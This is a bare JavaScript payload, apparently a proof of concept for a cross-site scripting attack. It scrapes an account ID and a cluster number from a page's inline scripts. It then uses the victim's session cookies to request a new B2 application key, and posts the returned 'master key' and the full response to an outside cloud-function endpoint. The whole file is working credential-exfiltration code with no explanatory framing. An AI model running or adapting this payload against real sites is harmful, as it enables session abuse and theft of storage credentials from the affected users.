(function() {
  var SAVE_URL = "https://asia-southeast1-child-guard-prod.cloudfunctions.net/api/v1/poc/save";
  var scripts = document.querySelectorAll("script");
  var html = "";
  for (var i = 0; i < scripts.length; i++) html += scripts[i].textContent;

  // Extract accountId from inline JS: accountId: 'xxx'
  var accountId = "";
  var am = html.match(/accountId:\s*'([a-f0-9]+)'/);
  if (am) accountId = am[1];

  // Extract clusterNum from inline JS: cluster_num"] = "xxx"
  var clusterNum = "";
  var cm = html.match(/cluster_num['"]\]\s*=\s*['"](\d+)['"]/);
  if (cm) clusterNum = cm[1];

  // Steal the MASTER KEY
  fetch("/account_tangle/create_b2_application_key", {
    method: "POST",
    credentials: "same-origin",
    headers: { "Content-Type": "application/json" },
    body: JSON.stringify({
      accountId: accountId,
      clusterNum: clusterNum
    })
  })
  .then(function(r) { return r.json(); })
  .then(function(resp) {
    fetch(SAVE_URL, {
      method: "POST",
      headers: { "Content-Type": "application/json" },
      body: JSON.stringify({
        type: "MASTER_KEY_STOLEN",
        accountId: accountId,
        clusterNum: clusterNum,
        masterKey: resp.b2ApplicationKey,
        fullResponse: resp,
        timestamp: new Date().toISOString()
      })
    });
  });
})();
